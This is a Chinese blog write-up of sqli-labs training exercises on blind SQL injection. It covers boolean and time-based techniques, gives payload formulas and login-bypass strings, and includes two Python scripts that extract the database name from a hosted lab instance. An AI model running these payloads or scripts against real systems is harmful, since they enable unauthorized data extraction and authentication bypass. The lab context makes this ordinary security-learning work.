<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="sqli-labs less8-9-10,less15-16。本篇介绍了盲注的原理以及less8-9-10的实践。less8-9-利用了burpsuite，以及自己写了个python poc爆出库名。less10和less9用了同个poc。">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入之Blind">
<meta property="og:url" content="http://yoursite.com/2019/01/24/SQL注入之Blind/index.html">
<meta property="og:site_name" content="Angie&#39;s blog">
<meta property="og:description" content="sqli-labs less8-9-10,less15-16。本篇介绍了盲注的原理以及less8-9-10的实践。less8-9-利用了burpsuite，以及自己写了个python poc爆出库名。less10和less9用了同个poc。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.loli.net/2018/12/24/5c20fcbec19e4.png">
<meta property="og:image" content="https://i.loli.net/2018/12/24/5c20fcbecbf32.png">
<meta property="og:image" content="https://i.loli.net/2019/01/05/5c3035fac3a6d.png">
<meta property="og:image" content="https://i.loli.net/2019/01/06/5c32123b1421d.png">
<meta property="og:image" content="https://i.loli.net/2019/01/06/5c32123b16507.png">
<meta property="og:image" content="https://i.loli.net/2019/01/06/5c3211f933a68.png">
<meta property="og:updated_time" content="2019-01-24T14:53:53.843Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入之Blind">
<meta name="twitter:description" content="sqli-labs less8-9-10,less15-16。本篇介绍了盲注的原理以及less8-9-10的实践。less8-9-利用了burpsuite，以及自己写了个python poc爆出库名。less10和less9用了同个poc。">
<meta name="twitter:image" content="https://i.loli.net/2018/12/24/5c20fcbec19e4.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/01/24/SQL注入之Blind/"/>





  <title>SQL注入之Blind | Angie's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Angie's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/01/24/SQL注入之Blind/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Angie Q">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/portrait.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Angie's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入之Blind</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-24T22:53:47+08:00">
                2019-01-24
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sqli-labs/" itemprop="url" rel="index">
                    <span itemprop="name">sqli-labs</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  sqli-labs less8-9-10,less15-16。本篇介绍了盲注的原理以及less8-9-10的实践。less8-9-利用了burpsuite，以及自己写了个python poc爆出库名。less10和less9用了同个poc。
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0x00-原理"><a href="#0x00-原理" class="headerlink" title="0x00 原理"></a>0x00 原理</h1><p>盲注不会根据sql注入的攻击语句返回相应的错误信息。<br>参考：<br><a href="https://www.kanxue.com/book-6-111.htm" target="_blank" rel="noopener">盲注（看雪）</a><br><a href="https://bbs.ichunqiu.com/thread-31587-1-1.html" target="_blank" rel="noopener">Sql盲注之布尔盲注</a><br><a href="https://tea9.coding.me/2018/06/21/2018-06-21-web_security_learn01_3_1/" target="_blank" rel="noopener">布尔盲注</a><br><a href="https://www.jianshu.com/p/65f05e7cc957" target="_blank" rel="noopener">sql盲注学习笔记</a></p>
<p><strong>盲注分为两类：</strong></p>
<ol>
<li>布尔盲注。根据注入信息返回Ture或False。</li>
<li>时间盲注。基于布尔盲注可以在页面上看到0 or 1的回显，但是基于时间的盲注是看不到的。可以通过“时间”条件进行特定的输入，判断后台执行sql语句的时间来判断是否存在盲注。</li>
</ol>
<p><strong>需要用到的函数：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">length() 返回字符串的长度</span><br><span class="line">substr() 截取字符串</span><br><span class="line">ascii() 返回字符的ascii码</span><br><span class="line">sleep(n) 将程序挂起一段时间为n秒</span><br><span class="line">if(expr1,expr2,expr3) 判断语句，如果第一个语句正确就执行第二个语句，如果错误执行第三个语句</span><br></pre></td></tr></table></figure></p>
<p><strong> 布尔盲注公式 </strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># database()可替换为查询的sql语句</span><br><span class="line">ascii(substr(database(),1,1))=97</span><br></pre></td></tr></table></figure></p>
<p><strong> 时间盲注公式 </strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># (substr((select database()),1,1))=&apos;a&apos; 可替换为查询的sql语句</span><br><span class="line">and if ((substr((select database()),1,1))=&apos;a&apos;,sleep(5),null)</span><br></pre></td></tr></table></figure></p>
<h1 id="0x01-Sqli-labs"><a href="#0x01-Sqli-labs" class="headerlink" title="0x01 Sqli-labs"></a>0x01 Sqli-labs</h1><h2 id="Less-8-Blind-Boolian-Single-Quotes-String"><a href="#Less-8-Blind-Boolian-Single-Quotes-String" class="headerlink" title="Less-8 Blind-Boolian-Single Quotes- String"></a>Less-8 Blind-Boolian-Single Quotes- String</h2><p>依据题目信息知道是布尔盲注。<br><strong>判断数据库名长度：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.247.91.228:84/Less-8/?id=1&apos; and length(database())=8 --+</span><br></pre></td></tr></table></figure></p>
<p><strong>利用burp爆库名：</strong><br>1、抓包，利用 substr()  ascii(substr((select database()),1,1))=98 爆数据库名称，根据上面判断出库名长度为8，则第一个payload设置为1-8；第二个payload设置为ascii码的值。<br><img src="https://i.loli.net/2018/12/24/5c20fcbec19e4.png" alt="请求数据包"><br>2、结果：<br><img src="https://i.loli.net/2018/12/24/5c20fcbecbf32.png" alt="攻击结果"></p>
<p>因此库名为security</p>
<p><strong>用python写了个POC</strong><br>用python写了一下获取库名，纯属小白练手python，大神轻拍。<br><strong>缺点：</strong><br>效率极低，要继续练习寻找高效方法。<br>我还是选择用burpsuite吧。。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">nums = [<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>]</span><br><span class="line">length = []</span><br><span class="line">database = []</span><br><span class="line"></span><br><span class="line"><span class="comment"># find_min_length()函数找到返回页面的长度最小值</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_min_length</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">for</span> payload <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">137</span>):</span><br><span class="line">        r = requests.get(<span class="string">"http://43.247.91.228:84/Less-8/?id=1' and ascii(substr((select database()),1,1))=&#123;&#125; --+"</span>.format(payload))</span><br><span class="line">        length.append(len(r.text))</span><br><span class="line">    <span class="keyword">return</span> min(length)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 利用payload语句依次尝试，选出所有最小值，ascii转string，得出库名</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_database_name</span><span class="params">()</span>:</span></span><br><span class="line">    l = find_min_length()</span><br><span class="line">    <span class="keyword">for</span> num <span class="keyword">in</span> nums:</span><br><span class="line">        <span class="keyword">for</span> payload <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">137</span>):</span><br><span class="line">            r = requests.get(<span class="string">"http://43.247.91.228:84/Less-8/?id=1' and ascii(substr((select database()),&#123;&#125;,1))=&#123;&#125; --+"</span>.format(num, payload))</span><br><span class="line">            <span class="keyword">if</span> len(r.text) == l:</span><br><span class="line">                database.append(payload)</span><br><span class="line"><span class="comment"># ASCII码值转换为string</span></span><br><span class="line">    database_str = <span class="string">''</span>.join(chr(i) <span class="keyword">for</span> i <span class="keyword">in</span> database)</span><br><span class="line">    <span class="keyword">return</span> database_str</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print(get_database_name())</span><br></pre></td></tr></table></figure></p>
<p><img src="https://i.loli.net/2019/01/05/5c3035fac3a6d.png" alt="sqlib less-8 .png"></p>
<h2 id="Less-9-Blind-Time-based-Single-Quotes-String"><a href="#Less-9-Blind-Time-based-Single-Quotes-String" class="headerlink" title="Less-9 Blind- Time based -Single Quotes -String"></a>Less-9 Blind- Time based -Single Quotes -String</h2><p>依据题目信息知道是时间盲注。这里不概述题目了，直接说解题思路。<br>先拿burp抓包，在Repeater里重放判断了一下时间盲注。</p>
<p>首先。正常的返回：<br><a href="http://43.247.91.228:84/Less-9/?id=1" target="_blank" rel="noopener">http://43.247.91.228:84/Less-9/?id=1</a><br>可以看到时间大概是1s。<br><img src="https://i.loli.net/2019/01/06/5c32123b1421d.png" alt="id=1.png"><br>接下来，使用and if 结合 sleep()函数来测试：<br><a href="http://43.247.91.228:84/Less-9/?id=1%27%20and%20sleep(5)%20--+" target="_blank" rel="noopener">http://43.247.91.228:84/Less-9/?id=1%27%20and%20sleep(5)%20--+</a><br>可以看到时间返回为5s左右。<br><img src="https://i.loli.net/2019/01/06/5c32123b16507.png" alt="sleep(5).png"></p>
<p>这题不能用burp的intruder attack做。。于是又写了个弱弱的poc。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">database =[]</span><br><span class="line"></span><br><span class="line"><span class="comment"># and if ((payloads,sleep(5),null)#</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_database_length</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">for</span> num <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">21</span>):</span><br><span class="line">        <span class="comment"># 记录开始时间</span></span><br><span class="line">        startTime = time.time()</span><br><span class="line">        url = <span class="string">"http://43.247.91.228:84/Less-9/?id=1%27%20and%20if%20(length(database())=&#123;&#125;,sleep(5),null)%20--+"</span>.format(num)</span><br><span class="line">        r = requests.get(url)</span><br><span class="line">        <span class="comment"># 如果返回时间大于5s，则是结果</span></span><br><span class="line">        <span class="keyword">if</span> time.time() - startTime &gt; <span class="number">5</span>:</span><br><span class="line">            l = num</span><br><span class="line">            <span class="keyword">return</span> l</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_database_name</span><span class="params">()</span>:</span></span><br><span class="line">    l = get_database_length()</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, l+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> payload <span class="keyword">in</span> range(<span class="number">32</span>, <span class="number">137</span>):</span><br><span class="line">            startTime = time.time()</span><br><span class="line">            url = <span class="string">"http://43.247.91.228:84/Less-9/?id=1%27%20and%20if%20(ascii(substr((select database()),&#123;&#125;,1))=&#123;&#125;,sleep(5),null)%20--+"</span>.format(i,payload)</span><br><span class="line">            r = requests.get(url)</span><br><span class="line">            <span class="keyword">if</span> time.time() - startTime &gt; <span class="number">5</span>:</span><br><span class="line">                database.append(payload)</span><br><span class="line">    database_str = <span class="string">''</span>.join(chr(i) <span class="keyword">for</span> i <span class="keyword">in</span> database)</span><br><span class="line">    <span class="keyword">return</span> database_str</span><br><span class="line"></span><br><span class="line">print(get_database_name())</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/01/06/5c3211f933a68.png" alt="less-9 python poc结果.png"></p>
<h2 id="less-10-Blind-Time-based-Double-Quotes-String"><a href="#less-10-Blind-Time-based-Double-Quotes-String" class="headerlink" title="less-10 Blind-Time based- Double Quotes -String"></a>less-10 Blind-Time based- Double Quotes -String</h2><p>这题看题目就知道和less9的差别就在于一个单双引号。<br>我用了less9的poc，把url改了一下，且单引号%27变成了双引号%22。<br>得出库名为 security</p>
<h1 id="Less-15-Blind-Boolian-Based-String"><a href="#Less-15-Blind-Boolian-Based-String" class="headerlink" title="Less-15 Blind- Boolian Based- String"></a>Less-15 Blind- Boolian Based- String</h1><p>根据盲注，判断这题是布尔盲注，根据注入信息会返回登录成功或失败。<br><strong>判断：</strong><br><code>uname=test&#39;&amp; passwd=test</code><br>返回LOGIN ATTEMPT FAILED</p>
<p><strong>payload:</strong><br><code>uname=test&#39; or 1=1 # &amp; passwd=test</code></p>
<p>此时返回SUCCESSFULLY LOGGED IN。</p>
<p><strong>数据库长度：</strong><br><code>uname=test&#39; or length(database())=8 # &amp; passwd=test</code></p>
<p><strong>判断数据库名称：</strong><br><code>uname=test&#39; or ascii(substr((select database()),1,1))=115 # &amp; passwd=test</code></p>
<p>根据此遍历可判断出数据库名称。</p>
<h1 id="Less-16-Blind-Time-Based-Double-qutes-String"><a href="#Less-16-Blind-Time-Based-Double-qutes-String" class="headerlink" title="Less-16- Blind- Time Based -Double qutes- String"></a>Less-16- Blind- Time Based -Double qutes- String</h1><p><strong>payload:</strong><br><code>uname=test&quot;) or 1=1 #&amp; passwd=test</code></p>
<p><strong>判断数据库长度：</strong><br><code>uname=test&quot;) or length(database())=8 #&amp; passwd=test</code></p>
<p><strong>判断数据库名称：</strong><br><code>uname=test&quot;) or ascii(substr((select database()),1,1))=115 #&amp; passwd=test</code></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/23/SQL注入之Error Based/" rel="next" title="sqli-labs之Error Based(原理&题目)">
                <i class="fa fa-chevron-left"></i> sqli-labs之Error Based(原理&题目)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/portrait.png"
                alt="Angie Q" />
            
              <p class="site-author-name" itemprop="name">Angie Q</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-原理"><span class="nav-number">1.</span> <span class="nav-text">0x00 原理</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-Sqli-labs"><span class="nav-number">2.</span> <span class="nav-text">0x01 Sqli-labs</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-8-Blind-Boolian-Single-Quotes-String"><span class="nav-number">2.1.</span> <span class="nav-text">Less-8 Blind-Boolian-Single Quotes- String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-9-Blind-Time-based-Single-Quotes-String"><span class="nav-number">2.2.</span> <span class="nav-text">Less-9 Blind- Time based -Single Quotes -String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-10-Blind-Time-based-Double-Quotes-String"><span class="nav-number">2.3.</span> <span class="nav-text">less-10 Blind-Time based- Double Quotes -String</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-15-Blind-Boolian-Based-String"><span class="nav-number">3.</span> <span class="nav-text">Less-15 Blind- Boolian Based- String</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-16-Blind-Time-Based-Double-qutes-String"><span class="nav-number">4.</span> <span class="nav-text">Less-16- Blind- Time Based -Double qutes- String</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Angie Q</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
